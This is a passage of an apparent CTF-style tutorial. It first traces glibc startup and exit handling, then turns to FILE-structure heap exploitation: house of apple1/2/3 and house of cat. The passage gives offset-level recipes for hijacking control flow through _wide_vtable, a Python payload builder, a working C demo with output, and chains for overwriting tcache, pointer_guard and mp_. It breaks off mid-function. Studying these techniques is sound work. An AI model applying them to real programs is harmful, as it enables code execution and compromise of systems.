l.lwz r3, got(_dl_fini)(r16)

l.jr r22
l.nop

END (_start)

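This is where _dl_start and _dl_init are called.
That completes initialization. call_fini (statically linked programs) and rtld_fini (dynamically linked programs) are likewise registered in __libc_start_main: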

__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);
...
/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

At the end of __libc_start_main:

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);

_Noreturn static __always_inline void
__libc_start_call_main (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv MAIN_AUXVEC_DECL)
{
exit (main (argc, argv, __environ MAIN_AUXVEC_PARAM));
}

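This is what finally calls main and exit, which also explains why the return address of main always sits at a fixed offset inside __libc_start_call_main.
Now back to the registered rtld_fini. It actually calls _dl_fini, whose job is to run the destructors of every module in the process, i.e. to walk .fini_array. The relevant part of its source: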

/* Is there a destructor function?  */
if (l->l_info[DT_FINI_ARRAY] != NULL
|| (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
{
/* When debugging print a message first. */
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
DSO_FILENAME (l->l_name),
ns);

/* First see whether an array is given. */
if (l->l_info[DT_FINI_ARRAY] != NULL)
{
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
}

/* Next try the old-style destructor. */
if (ELF_INITFINI && l->l_info[DT_FINI] != NULL)
DL_CALL_DT_FINI
(l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
}

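This runs .fini and walks .fini_array.

Summary

  • The kernel executes the execve() system call
  • The ELF executable is loaded
    • Dynamically linked program: .interp is found
      • The kernel loads the dynamic linker ld.so
      • Jump to the ld.so entry point -> _dl_start (dl-start.S)
        • ld.so loads the dependent libraries (libc.so etc.) and relocates them
        • _dl_init
          • call_init (runs the constructors of the loaded shared objects)
      • Jump to the program entry point -> _start (start.S)
    • Statically linked program: jump directly to _start (start.S)
  • _start
    • __libc_start_main
      • Register destructors:
      • Static linking: __cxa_atexit(call_fini)
        • the program's own destructors
      • Dynamic linking: __cxa_atexit(rtld_fini)
        • the dynamic linker does the final cleanup through _dl_fini
      • call_init (runs the program's .init and .init_array)
  • __libc_start_call_main
    • call main()
    • exit(main())
  • exit(status) is called
    • __run_exit_handlers(status)
      • call the TLS destructors: __call_tls_dtors
      • walk exit_function_list
        • ef_cxa
          • static program: call_fini
            • runs the program's own .fini_array
          • dynamic program: rtld_fini
            • _dl_fini
              • runs the shared objects' .fini_array/DT_FINI in dependency order
              • cleans up dynamic linker resources
        • ef_at -> functions registered with atexit
        • ef_on -> functions registered with on_exit
        • other flavors are ignored
      • if a new callback is registered during execution, go back to the head of the list
      • free dynamically allocated callback nodes
      • if run_list_atexit = true, run the __libc_atexit hook, by default _IO_cleanup()
    • _exit(status)
  • Kernel: the process is fully terminated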

house of apple2 | house of cat

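  • Root cause: the _wide_data structure has a _wide_vtable member, analogous to vtable, that points to an _IO_jump_t structure. As with vtable, glibc defines macros that call functions through _wide_vtable; the ones actually used inside glibc include _IO_WSETBUF, _IO_WUNDERFLOW and _IO_WDOALLOCATE. Unlike the vtable macros, these perform no check on where _wide_vtable points. Compare the two expansions:
    _IO_OVERFLOW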
    #define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
    #define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    # define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
    _IO_WOVERFLOW
    #define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
    #define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
    #define _IO_WIDE_JUMPS(THIS) _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

_IO_wfile_overflow

  • Call chain
  1. _IO_wfile_overflow
    wint_t
    _IO_wfile_overflow (FILE *f, wint_t wch)
    {
    if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    /* If currently reading or no buffer allocated. */
    if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
    /* Allocate a buffer if needed. */
    if (f->_wide_data->_IO_write_base == 0)
    {
    _IO_wdoallocbuf (f);// execution must reach this call
    // ......
    }
    }
    }
    Conditions to satisfy:
  • (f->_flags & _IO_NO_WRITES) == 0
  • (f->_flags & _IO_CURRENTLY_PUTTING) == 0
  • f->_wide_data->_IO_write_base == 0
  2. _IO_wdoallocbuf
    void
    _IO_wdoallocbuf (FILE *fp)
    {
    if (fp->_wide_data->_IO_buf_base)
    return;
    if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)// call through an _IO_WXXXX macro
    return;
    _IO_wsetb (fp, fp->_wide_data->_shortbuf,
    fp->_wide_data->_shortbuf + 1, 0);
    }
    libc_hidden_def (_IO_wdoallocbuf)
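    Conditions to satisfy:
  • fp->_wide_data->_IO_buf_base == 0
  • (fp->_flags & _IO_UNBUFFERED) == 0
  3. _IO_WDOALLOCATE

  4. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

In summary:

  • Set _flags to ~(2 | 0x8 | 0x800). If rdi does not need to be controlled, 0 is enough; to get a shell, use "  sh;" with two leading spaces, since ";" (0x3b) has the 0x2 and 0x8 bits set and would fail the checks above
  • Set vtable to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset) so that _IO_wfile_overflow ends up being called
  • Set _wide_data to a controllable heap address A, i.e. *(fp + 0xa0) = A
  • Set _wide_data->_IO_write_base to 0, i.e. *(A + 0x18) = 0
  • Set _wide_data->_IO_buf_base to 0, i.e. *(A + 0x30) = 0
  • Set _wide_data->_wide_vtable to a controllable heap address B, i.e. *(A + 0xe0) = B
  • Set _wide_data->_wide_vtable->doallocate to the address C used to hijack RIP, i.e. *(B + 0x68) = C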
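
The offsets listed above can be packed into one contiguous buffer: the fake FILE, then the wide data A, then the wide vtable B. This is a minimal sketch under stated assumptions: it is triggered through _IO_flush_all_lockp (hence `_IO_write_ptr > _IO_write_base` and `_mode <= 0`), `_lock` at 0x88 needs to point to writable zeroed memory (an assumption not covered in the notes), and the function name and every parameter are hypothetical.

```python
import struct

FILE_SIZE = 0xE0         # FILE plus vtable pointer on x86-64
WIDE_DATA_SIZE = 0xE8    # large enough to hold _wide_vtable at +0xE0
WIDE_VTABLE_SIZE = 0x70  # large enough to hold doallocate at +0x68


def build_apple2_overflow(fp_addr, wfile_jumps, lock_addr, target):
    """Fake FILE at fp_addr, wide data A right after it, wide vtable B after A."""
    wide_data = fp_addr + FILE_SIZE           # address A
    wide_vtable = wide_data + WIDE_DATA_SIZE  # address B
    buf = bytearray(FILE_SIZE + WIDE_DATA_SIZE + WIDE_VTABLE_SIZE)

    def put64(offset, value):
        struct.pack_into("<Q", buf, offset, value)

    buf[0:5] = b"  sh;"      # _flags = "  sh": bits 0x2, 0x8 and 0x800 are clear
    put64(0x20, 0)           # _IO_write_base
    put64(0x28, 1)           # _IO_write_ptr > _IO_write_base
    put64(0x88, lock_addr)   # _lock (assumed to need a valid writable pointer)
    put64(0xA0, wide_data)   # _wide_data = A
    struct.pack_into("<i", buf, 0xC0, 0)  # _mode <= 0
    put64(0xD8, wfile_jumps)  # vtable whose overflow slot is _IO_wfile_overflow

    put64(FILE_SIZE + 0x18, 0)            # A->_IO_write_base = 0
    put64(FILE_SIZE + 0x30, 0)            # A->_IO_buf_base = 0
    put64(FILE_SIZE + 0xE0, wide_vtable)  # A->_wide_vtable = B
    put64(FILE_SIZE + WIDE_DATA_SIZE + 0x68, target)  # B->doallocate = C
    return bytes(buf)


blob = build_apple2_overflow(0x555555559000, 0x7FFFF7E17F58,
                             0x555555559800, 0x7FFFF7C50D70)
```

Keeping A and B adjacent to the FILE means a single heap write of `len(blob)` bytes sets up the whole chain.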

_IO_wfile_underflow_mmap

  • Call chain
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;

    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp); // execution must reach this call
    }
    //......
    }
    Conditions:
  • (fp->_flags & _IO_NO_READS) == 0
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_wide_data->_IO_buf_base == NULL and fp->_wide_data->_IO_save_base == NULL
  2. _IO_wdoallocbuf

  3. _IO_WDOALLOCATE

  4. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

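In summary:

  • Set _flags to ~4 (the _IO_wdoallocbuf step additionally needs bit 2, _IO_UNBUFFERED, to be clear). If rdi does not need to be controlled, 0 is enough. To get a shell, use the string "  sh;" with two leading spaces, since the low byte 0x3b of ";sh;" has bit 2 set.
  • Set vtable to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset) so that _IO_wfile_underflow_mmap is the function that gets called.
  • _IO_read_ptr < _IO_read_end, i.e. *(fp + 8) < *(fp + 0x10).
  • Set _wide_data to a controlled heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8).
  • Set _wide_data->_IO_buf_base to 0, i.e. *(A + 0x30) = 0.
  • Set _wide_data->_IO_save_base to 0 or to a valid address that can be passed to free, i.e. *(A + 0x40) = 0.
  • Set _wide_data->_wide_vtable to a controlled heap address B, i.e. *(A + 0xe0) = B.
  • Set _wide_data->_wide_vtable->doallocate to the address C used to hijack RIP, i.e. *(B + 0x68) = C.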
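Whether a command string can double as the _flags word is easy to check by hand, but a tiny helper avoids mistakes. The sketch below reads the first four bytes of a candidate string as a little-endian _flags value and tests the bits that this path needs clear. The helper name flags_prefix_ok is made up for illustration; the flag constants are the glibc values for _IO_UNBUFFERED, _IO_NO_READS, _IO_NO_WRITES and _IO_CURRENTLY_PUTTING.

```python
import struct

IO_UNBUFFERED = 0x0002
IO_NO_READS = 0x0004
IO_NO_WRITES = 0x0008
IO_CURRENTLY_PUTTING = 0x0800


def flags_prefix_ok(prefix, must_be_clear):
    """True if the first four bytes of `prefix`, read as a little-endian
    _flags word, have none of the `must_be_clear` bits set."""
    word = struct.unpack("<I", prefix[:4].ljust(4, b"\x00"))[0]
    return word & must_be_clear == 0


# Bits that must be clear on the _IO_wfile_underflow_mmap path,
# including the _IO_UNBUFFERED test inside _IO_wdoallocbuf.
UNDERFLOW_MMAP_MASK = IO_NO_READS | IO_UNBUFFERED

for candidate in (b"  sh;", b";sh;", b"\x00" * 4):
    print(candidate, flags_prefix_ok(candidate, UNDERFLOW_MMAP_MASK))
```

The same helper works for the _IO_wfile_overflow path by passing IO_UNBUFFERED | IO_NO_WRITES | IO_CURRENTLY_PUTTING as the mask.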

_IO_wdefault_xsgetn

  • Call chain
  1. _IO_wdefault_xsgetn
    size_t
    _IO_wdefault_xsgetn (FILE *fp, void *data, size_t n)
    {
    size_t more = n;
    wchar_t *s = (wchar_t*) data;
    for (;;)
    {
    /* Data available. */
    ssize_t count = (fp->_wide_data->_IO_read_end
    - fp->_wide_data->_IO_read_ptr);
    if (count > 0)
    {
    if ((size_t) count > more)
    count = more;
    if (count > 20)
    {
    s = __wmempcpy (s, fp->_wide_data->_IO_read_ptr, count);
    fp->_wide_data->_IO_read_ptr += count;
    }
    else if (count <= 0)
    count = 0;
    else
    {
    wchar_t *p = fp->_wide_data->_IO_read_ptr;
    int i = (int) count;
    while (--i >= 0)
    *s++ = *p++;
    fp->_wide_data->_IO_read_ptr = p;
    }
    more -= count;
    }
    if (more == 0 || __wunderflow (fp) == WEOF)
    break;
    }
    return n - more;
    }
    libc_hidden_def (_IO_wdefault_xsgetn)
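    Conditions:
  • more is initialised from the third argument n, so n (the rdx register) must be non-zero
  • set fp->_wide_data->_IO_read_ptr == fp->_wide_data->_IO_read_end so that count is 0 and the if (count > 0) branch is skipped
  2. __wunderflow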
wint_t
__wunderflow (FILE *fp)
{
if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide (fp, 1) != 1))
return WEOF;

if (fp->_mode == 0)
_IO_fwide (fp, 1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_wget_mode (fp) == EOF)
return WEOF;
// ......
}

Conditions:
  • fp->_mode > 0 and (fp->_flags & _IO_CURRENTLY_PUTTING) != 0

  3. _IO_switch_to_wget_mode
int
_IO_switch_to_wget_mode (FILE *fp)
{
if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) // execution must reach this call
return EOF;
// .....
}

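Conditions:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base

  4. _IO_WOVERFLOW

  5. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

In summary:

  • Set _flags to 0x800.
  • Set vtable to the address of _IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps (plus or minus an offset) so that _IO_wdefault_xsgetn is the function that gets called.
  • Set _mode to a value greater than 0, i.e. *(fp + 0xc0) > 0.
  • Set _wide_data to a controlled heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_read_ptr == _wide_data->_IO_read_end, i.e. *A == *(A + 8).
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(A + 0x20) > *(A + 0x18).
  • Set _wide_data->_wide_vtable to a controlled heap address B, i.e. *(A + 0xe0) = B.
  • Set _wide_data->_wide_vtable->overflow to the address C used to hijack RIP, i.e. *(B + 0x18) = C (this chain ends in _IO_WOVERFLOW, which uses slot 0x18 rather than the doallocate slot 0x68).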
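The branch conditions of this chain can be checked with a small model before building a payload. The sketch below is a simplified Python model of the first loop iteration of _IO_wdefault_xsgetn followed by __wunderflow and _IO_switch_to_wget_mode. It is an illustration only: the function name is hypothetical, `available` stands for the number of wide characters between _IO_read_ptr and _IO_read_end, and the _mode == 0 case (which depends on _IO_fwide) is treated as a failure because the notes recommend _mode > 0.

```python
IO_CURRENTLY_PUTTING = 0x0800


def xsgetn_reaches_woverflow(n, available, mode, flags, w_write_ptr, w_write_base):
    """Return True if the modelled path ends in _IO_WOVERFLOW."""
    copied = max(0, min(available, n))      # characters served from the buffer
    if n - copied == 0:
        return False                        # more == 0: __wunderflow is never called
    if mode <= 0:
        return False                        # model assumption: only _mode > 0 is considered
    if not flags & IO_CURRENTLY_PUTTING:
        return False                        # _IO_in_put_mode(fp) is false
    return w_write_ptr > w_write_base       # condition inside _IO_switch_to_wget_mode


# Values matching the summary: rdx != 0, empty read buffer, _mode > 0,
# _flags = 0x800 and _IO_write_ptr > _IO_write_base.
print(xsgetn_reaches_woverflow(8, 0, 1, 0x800, 0x1008, 0x1000))
```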

_IO_wfile_seekoff(house of cat)

  • Call chain
  1. _IO_wfile_seekoff
    off64_t 
    _IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode) {
    off64_t result;
    off64_t delta, new_offset;
    long int count;
    /* Short-circuit into a separate function. We don't want to mix any functionality and we don't want to touch anything inside the FILE object. */
    if (mode == 0)
    return do_ftell_wide (fp);

    ...
    bool was_writing = ((fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) || _IO_in_put_mode (fp));
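    /* Flush unwritten characters. (This may do an unneeded write if we seek within the buffer. But to be able to switch to reading, we would need to set egptr to pptr. That can't be done in the current design, which assumes file_ptr() is eGptr. Anyway, since we probably end up flushing when we close(), it doesn't make much difference.) FIXME: simulate mem-mapped files. */
    if (was_writing && _IO_switch_to_wget_mode (fp))
    return WEOF;
    // ......
    }
    Conditions:
  • mode (the fourth argument of the call, not fp->_mode) is non-zero
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base, or (fp->_flags & 0x0800) != 0
  2. _IO_switch_to_wget_mode
    Conditions:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  3. _IO_WOVERFLOW

  4. *(fp->_wide_data->_wide_vtable + 0x18)(fp)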

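In summary:

  • Set _flags to ~0x8; if _lock cannot be guaranteed to point to readable and writable memory, also set _flags |= 0x8000.
  • Set vtable to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset) so that _IO_wfile_seekoff is the function that gets called.
  • Set _mode to a value greater than 0, i.e. *(fp + 0xc0) > 0.
  • Set _wide_data to a controlled heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_read_ptr > _wide_data->_IO_read_end, i.e. *A > *(A + 8).
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(A + 0x20) > *(A + 0x18).
  • Set _wide_data->_wide_vtable to a controlled heap address B, i.e. *(A + 0xe0) = B.
  • Set _wide_data->_wide_vtable->overflow to the address C used to hijack RIP, i.e. *(B + 0x18) = C (this chain ends in _IO_WOVERFLOW, which uses slot 0x18 rather than the doallocate slot 0x68).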
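One detail that is easy to mix up on this path is that the early-return test uses the `mode` argument of _IO_wfile_seekoff, not fp->_mode. The following sketch models only the excerpt shown above. The function name and the parameter `mode_arg` are illustrative, and everything outside the excerpt (locking, the rest of the seek logic) is ignored.

```python
IO_CURRENTLY_PUTTING = 0x0800


def seekoff_reaches_woverflow(mode_arg, flags, w_write_ptr, w_write_base):
    """Model of the _IO_wfile_seekoff excerpt plus _IO_switch_to_wget_mode."""
    if mode_arg == 0:
        return False                        # short-circuits into do_ftell_wide
    was_writing = (w_write_ptr > w_write_base) or bool(flags & IO_CURRENTLY_PUTTING)
    if not was_writing:
        return False                        # _IO_switch_to_wget_mode is not called
    return w_write_ptr > w_write_base       # needed inside _IO_switch_to_wget_mode


print(seekoff_reaches_woverflow(1, 0, 0x2008, 0x2000))
```

Setting only the 0x800 flag makes was_writing true but still fails the second test, which is why the summary insists on _IO_write_ptr > _IO_write_base.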

house of apple1

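  • Core idea: forge an _IO_FILE structure on the heap at a known address A, replace A + 0xd8 (vtable) with the address of _IO_wstrn_jumps, set A + 0xa0 (_wide_data) to B, and set the remaining members so that _IO_OVERFLOW gets called. The exit function then ends up in _IO_wstrn_overflow, which overwrites the region from B to B + 0x38 with A + 0xf0 or A + 0x1f0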
    static wint_t
    _IO_wstrn_overflow (FILE *fp, wint_t c)
    {
    _IO_wstrnfile *snf = (_IO_wstrnfile *) fp;
    if (fp->_wide_data->_IO_buf_base != snf->overflow_buf)
    {
    _IO_wsetb (fp, snf->overflow_buf,
    snf->overflow_buf + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)), 0);
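    // Controlling fp->_wide_data therefore controls the values in a range of memory starting at fp->_wide_data, which amounts to writing a known address to an arbitrary address.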
    fp->_wide_data->_IO_write_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_read_end = (snf->overflow_buf
    + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)));
    }

    fp->_wide_data->_IO_write_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_write_end = snf->overflow_buf;
    return c;
    }
  • Sometimes the free inside _IO_wsetb has to be bypassed
    #define _IO_FLAGS2_USER_WBUF 8
    // setting f->_flags2 to 8 bypasses it
    void
    _IO_wsetb (FILE *f, wchar_t *b, wchar_t *eb, int a)
    {
    if (f->_wide_data->_IO_buf_base && !(f->_flags2 & _IO_FLAGS2_USER_WBUF))
    free (f->_wide_data->_IO_buf_base); // must not be reached when _IO_buf_base is non-zero
    f->_wide_data->_IO_buf_base = b;
    f->_wide_data->_IO_buf_end = eb;
    if (a)
    f->_flags2 &= ~_IO_FLAGS2_USER_WBUF;
    else
    f->_flags2 |= _IO_FLAGS2_USER_WBUF;
    }

demo

// glibc 2.35-0ubuntu3
#define _GNU_SOURCE // needed for the fcloseall() declaration
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<unistd.h>
#include <string.h>

int main(void)
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setvbuf(stderr, 0, 2, 0);
    puts("[*] allocate a 0x100 chunk");
    size_t *p1 = malloc(0xf0);
    size_t *tmp = p1;
    size_t old_value = 0x1122334455667788;
    for (size_t i = 0; i < 0x100 / 8; i++)
    {
        p1[i] = old_value;
    }
    puts("===========================old value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================old value=======================");
    size_t puts_addr = (size_t)&puts;
    printf("[*] puts address: %p\n", (void *)puts_addr);
    size_t stderr_write_ptr_addr = puts_addr + 0x1997f8;
    printf("[*] stderr->_IO_write_ptr address: %p\n", (void *)stderr_write_ptr_addr);
    size_t stderr_flags2_addr = puts_addr + 0x199844;
    printf("[*] stderr->_flags2 address: %p\n", (void *)stderr_flags2_addr);
    size_t stderr_wide_data_addr = puts_addr + 0x199870;
    printf("[*] stderr->_wide_data address: %p\n", (void *)stderr_wide_data_addr);
    size_t sdterr_vtable_addr = puts_addr + 0x1998a8;
    printf("[*] stderr->vtable address: %p\n", (void *)sdterr_vtable_addr);
    size_t _IO_wstrn_jumps_addr = puts_addr + 0x194ef0;
    printf("[*] _IO_wstrn_jumps address: %p\n", (void *)_IO_wstrn_jumps_addr);
    puts("[+] step 1: change stderr->_IO_write_ptr to -1");
    *(size_t *)stderr_write_ptr_addr = (size_t)-1;
    puts("[+] step 2: change stderr->_flags2 to 8");
    *(size_t *)stderr_flags2_addr = 8;
    puts("[+] step 3: replace stderr->_wide_data with the allocated chunk");
    *(size_t *)stderr_wide_data_addr = (size_t)p1;
    puts("[+] step 4: replace stderr->vtable with _IO_wstrn_jumps");
    *(size_t *)sdterr_vtable_addr = (size_t)_IO_wstrn_jumps_addr;
    puts("[+] step 5: call fcloseall and trigger house of apple");
    fcloseall();
    tmp = p1;
    puts("===========================new value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================new value=======================");
}
Output:
[*] allocate a 0x100 chunk
===========================old value=======================
[0x56142e11b2a0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2b0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2c0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2d0]: 0x1122334455667788 0x1122334455667788
===========================old value=======================
[*] puts address: 0x7cb7d0280ed0
[*] stderr->_IO_write_ptr address: 0x7cb7d041a6c8
[*] stderr->_flags2 address: 0x7cb7d041a714
[*] stderr->_wide_data address: 0x7cb7d041a740
[*] stderr->vtable address: 0x7cb7d041a778
[*] _IO_wstrn_jumps address: 0x7cb7d0415dc0
[+] step 1: change stderr->_IO_write_ptr to -1
[+] step 2: change stderr->_flags2 to 8
[+] step 3: replace stderr->_wide_data with the allocated chunk
[+] step 4: replace stderr->vtable with _IO_wstrn_jumps
[+] step 5: call fcloseall and trigger house of apple
===========================new value=======================
[0x56142e11b2a0]: 0x00007cb7d041a790 0x00007cb7d041a890
[0x56142e11b2b0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2c0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2d0]: 0x00007cb7d041a790 0x00007cb7d041a890
===========================new value=======================

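Summary: given only a single largebin attack, _IO_wstrn_overflow can overwrite the values in an arbitrary address range with a known address, which is usually a heap address. By forging two or more _IO_FILE structures and linking them through the chain field, these writes can be combined.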
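The effect of _IO_wstrn_overflow on the target region can be reproduced as plain arithmetic. The sketch below lists the eight pointer-sized stores made when fp->_wide_data points at `wide_addr`, assuming the x86-64 layout in which overflow_buf sits at fp + 0xf0 and is 0x100 bytes long. The function name is hypothetical; the two addresses are derived from the demo output above (stderr is the printed vtable address minus 0xd8).

```python
def wstrn_overflow_stores(fp_addr, wide_addr):
    """Return {address: value} for the stores made by _IO_wstrn_overflow."""
    buf = fp_addr + 0xF0         # snf->overflow_buf
    buf_end = fp_addr + 0x1F0    # overflow_buf + 64 wchar_t of 4 bytes each
    values = [
        buf,      # 0x00 _IO_read_ptr
        buf_end,  # 0x08 _IO_read_end
        buf,      # 0x10 _IO_read_base
        buf,      # 0x18 _IO_write_base
        buf,      # 0x20 _IO_write_ptr
        buf,      # 0x28 _IO_write_end
        buf,      # 0x30 _IO_buf_base (set by _IO_wsetb)
        buf_end,  # 0x38 _IO_buf_end  (set by _IO_wsetb)
    ]
    return {wide_addr + 8 * i: v for i, v in enumerate(values)}


# stderr and the malloc'd chunk from the demo run.
stores = wstrn_overflow_stores(0x7CB7D041A6A0, 0x56142E11B2A0)
for addr in sorted(stores):
    print(hex(addr), hex(stores[addr]))
```

The printed pairs line up with the "new value" dump of the demo, which is a quick way to confirm which offsets receive A + 0xf0 and which receive A + 0x1f0.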

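Overwriting the tcache thread-local variable (< 2.37)

  • Forge at least two _IO_FILE structures
  • When _IO_OVERFLOW runs on the first _IO_FILE, use _IO_wstrn_overflow to overwrite the tcache variable with a known value, which gives control over tcache bin allocation
  • When _IO_OVERFLOW runs on the second _IO_FILE, use the malloc inside _IO_str_overflow to allocate at an arbitrary address, and its memcpy to write arbitrary values to that address
  • Use two arbitrary writes of arbitrary values to change pointer_guard and IO_accept_foreign_vtables, bypassing the check in _IO_vtable_check (or use one such write to change a function address in libc's GOT; many IO stream functions reach strlen/strcpy/memcpy/memset and similar functions through the libc GOT)
  • Use one more _IO_FILE with a freely forged vtable to hijack control flow

Overwriting the mp_ structure

  • Forge at least two _IO_FILE structures
  • When _IO_OVERFLOW runs on the first _IO_FILE, use _IO_wstrn_overflow to set mp_.tcache_bins to a very large value so that very large chunks are also managed through tcache bins
  • The remaining steps follow the same idea as above

Overwriting the pointer_guard thread-local variable + house of emma

  • Forge two _IO_FILE structures
  • When _IO_OVERFLOW runs on the first _IO_FILE, use _IO_wstrn_overflow to overwrite pointer_guard in the TLS structure with a known value
  • Use the second _IO_FILE for house of emma to take over the execution flow

Overwriting the global_max_fast global variable

After changing this variable, free a very large chunk directly to overwrite pointer_guard or the tcache variable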

house of apple3

The FILE structure has a member struct _IO_codecvt *_codecvt; at offset 0x98. This structure takes part in wide-character conversion; the related definitions are as follows:

struct _IO_codecvt
{
_IO_iconv_t __cd_in;
_IO_iconv_t __cd_out;
};

typedef struct
{
struct __gconv_step *step;
struct __gconv_step_data step_data;
} _IO_iconv_t;

struct __gconv_step
{
struct __gconv_loaded_object *__shlib_handle;
const char *__modname;

/* For internal use by glibc. (Accesses to this member must occur
when the internal __gconv_lock mutex is acquired). */
int __counter;

char *__from_name;
char *__to_name;

__gconv_fct __fct;
__gconv_btowc_fct __btowc_fct;
__gconv_init_fct __init_fct;
__gconv_end_fct __end_fct;

/* Information about the number of bytes needed or produced in this
step. This helps optimizing the buffer sizes. */
int __min_needed_from;
int __max_needed_from;
int __min_needed_to;
int __max_needed_to;

/* Flag whether this is a stateful encoding or not. */
int __stateful;

void *__data; /* Pointer to step-local data. */
};

struct __gconv_step_data
{
unsigned char *__outbuf; /* Output buffer for this step. */
unsigned char *__outbufend; /* Address of first byte after the output
buffer. */

/* Is this the last module in the chain. */
int __flags;

/* Counter for number of invocations of the module function for this
descriptor. */
int __invocation_counter;

/* Flag whether this is an internal use of the module (in the mb*towc*
and wc*tomb* functions) or regular with iconv(3). */
int __internal_use;

__mbstate_t *__statep;
__mbstate_t __state; /* This element must not be used directly by
any module; always use STATEP! */
};
house of apple3 focuses on three functions: __libio_codecvt_out, __libio_codecvt_in and __libio_codecvt_length. Their exploitable spots are nearly identical. Taking __libio_codecvt_in as the example, the source is analysed below:
enum __codecvt_result
__libio_codecvt_in (struct _IO_codecvt *codecvt, __mbstate_t *statep,
const char *from_start, const char *from_end,
const char **from_stop,
wchar_t *to_start, wchar_t *to_end, wchar_t **to_stop)
{
enum __codecvt_result result;
// gs comes from the first argument
struct __gconv_step *gs = codecvt->__cd_in.step;
int status;
size_t dummy;
const unsigned char *from_start_copy = (unsigned char *) from_start;

codecvt->__cd_in.step_data.__outbuf = (unsigned char *) to_start;
